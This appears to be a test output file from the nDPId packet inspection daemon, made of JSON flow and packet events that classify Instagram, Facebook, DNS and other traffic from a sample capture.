00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1436720900684,"flow_last_seen":1436720900750,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":55562,"flow_avg_l4_payload_len":1068,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.160","src_port":38816,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"}}
00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1436720908521,"flow_last_seen":1436720908542,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.160","src_port":38817,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1436720908521,"flow_last_seen":1436720908542,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.160","src_port":38817,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00834{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1436720908581,"flow_last_seen":1436720908769,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":8070,"flow_avg_l4_payload_len":424,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.136","src_port":60908,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}}
00705{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":150,"flow_first_seen":1436720950909,"flow_last_seen":1436720952614,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":143658,"flow_avg_l4_payload_len":957,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"31.13.86.52","dst_ip":"192.168.0.103","src_port":80,"dst_port":58216,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}}
00834{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1436720908572,"flow_last_seen":1436720908746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5231,"flow_avg_l4_payload_len":307,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.174","src_port":44558,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}}
00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1436720952611,"flow_last_seen":1436720952611,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"46.33.70.150","dst_ip":"192.168.0.103","src_port":80,"dst_port":40855,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1436720952611,"flow_last_seen":1436720952611,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"46.33.70.150","dst_ip":"192.168.0.103","src_port":80,"dst_port":40855,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1436720900684,"flow_last_seen":1436720900750,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":55562,"flow_avg_l4_payload_len":1068,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.160","src_port":38816,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"}}
00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1436720908521,"flow_last_seen":1436720908542,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.160","src_port":38817,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1436720908521,"flow_last_seen":1436720908542,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.160","src_port":38817,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1436720906022,"flow_last_seen":1436720906022,"flow_idle_time":180000,"flow_min_l4_payload_len":103,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.106","dst_ip":"192.168.0.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720952563,"flow_last_seen":1436720952563,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":27124,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1436720898354,"flow_last_seen":1436720899158,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":1509,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"173.252.107.4","src_port":56382,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1436720908466,"flow_last_seen":1436720910950,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":4671,"flow_avg_l4_payload_len":424,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33763,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1436720908466,"flow_last_seen":1436720910950,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":4671,"flow_avg_l4_payload_len":424,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33763,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1436720952553,"flow_last_seen":1436720952593,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":35450,"flow_avg_l4_payload_len":723,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"2.22.236.51","dst_ip":"192.168.0.103","src_port":80,"dst_port":44151,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
00695{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":81,"flow_first_seen":1436720900690,"flow_last_seen":1436720908566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":47902,"flow_avg_l4_payload_len":591,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.186","src_port":44379,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"}}
00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1436720906070,"flow_last_seen":1436720908431,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":5252,"flow_avg_l4_payload_len":437,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"31.13.93.52","dst_ip":"192.168.0.103","src_port":443,"dst_port":33934,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1436720906070,"flow_last_seen":1436720908431,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":5252,"flow_avg_l4_payload_len":437,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"31.13.93.52","dst_ip":"192.168.0.103","src_port":443,"dst_port":33934,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908216,"flow_last_seen":1436720908432,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":4639,"flow_avg_l4_payload_len":463,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33935,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908216,"flow_last_seen":1436720908432,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":4639,"flow_avg_l4_payload_len":463,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33935,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":68,"flow_first_seen":1436720898386,"flow_last_seen":1436720908442,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":41200,"flow_avg_l4_payload_len":605,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33936,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1436720898354,"flow_last_seen":1436720899158,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":1509,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"173.252.107.4","src_port":56382,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1436720908466,"flow_last_seen":1436720910950,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":4671,"flow_avg_l4_payload_len":424,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33763,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1436720908466,"flow_last_seen":1436720910950,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":4671,"flow_avg_l4_payload_len":424,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33763,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1436720952553,"flow_last_seen":1436720952593,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":35450,"flow_avg_l4_payload_len":723,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"2.22.236.51","dst_ip":"192.168.0.103","src_port":80,"dst_port":44151,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
00695{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":81,"flow_first_seen":1436720900690,"flow_last_seen":1436720908566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":47902,"flow_avg_l4_payload_len":591,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.186","src_port":44379,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"}}
00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1436720906070,"flow_last_seen":1436720908431,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":5252,"flow_avg_l4_payload_len":437,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"31.13.93.52","dst_ip":"192.168.0.103","src_port":443,"dst_port":33934,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1436720906070,"flow_last_seen":1436720908431,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":5252,"flow_avg_l4_payload_len":437,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"31.13.93.52","dst_ip":"192.168.0.103","src_port":443,"dst_port":33934,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908216,"flow_last_seen":1436720908432,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":4639,"flow_avg_l4_payload_len":463,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33935,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908216,"flow_last_seen":1436720908432,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":4639,"flow_avg_l4_payload_len":463,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33935,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":68,"flow_first_seen":1436720898386,"flow_last_seen":1436720908442,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":41200,"flow_avg_l4_payload_len":605,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33936,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1436720908524,"flow_last_seen":1436720908575,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":33603,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"}}
00597{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720906025,"flow_last_seen":1436720906025,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"192.168.0.255","src_port":520,"dst_port":520,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720906025,"flow_last_seen":1436720906025,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"192.168.0.255","src_port":520,"dst_port":520,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00666{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1436720942507,"flow_last_seen":1436720942524,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":21875,"flow_avg_l4_payload_len":875,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"92.122.48.138","dst_ip":"192.168.0.103","src_port":80,"dst_port":41562,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1436720942507,"flow_last_seen":1436720942524,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":21875,"flow_avg_l4_payload_len":875,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"92.122.48.138","dst_ip":"192.168.0.103","src_port":80,"dst_port":41562,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2216,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568796265146,"flow_last_seen":1568796265146,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1568796265146,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49360,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2216,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1568796265146,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1568796265146,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGAr7AqAIRHw1WNMDQAbvb0IW1AAAAALAC\/\/8u4wAAAgQFtAEDAwYBAQgKDXCenAAAAAAEAgAA"}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2217,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568796265147,"flow_last_seen":1568796265147,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1568796265147,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49361,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2217,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1568796265147,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1568796265147,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGAr7AqAIRHw1WNMDRAbs6ii8aAAAAALAC\/\/8mxAAAAgQFtAEDAwYBAQgKDXCenAAAAAAEAgAA"}
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2218,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1568796265158,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1568796265158,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAFQGLsIfDVY0wKgCEQG7wNDH6s7\/29CFtqASbHAaPQAAAgQFeAQCCApocroGDXCenAEDAwg="}
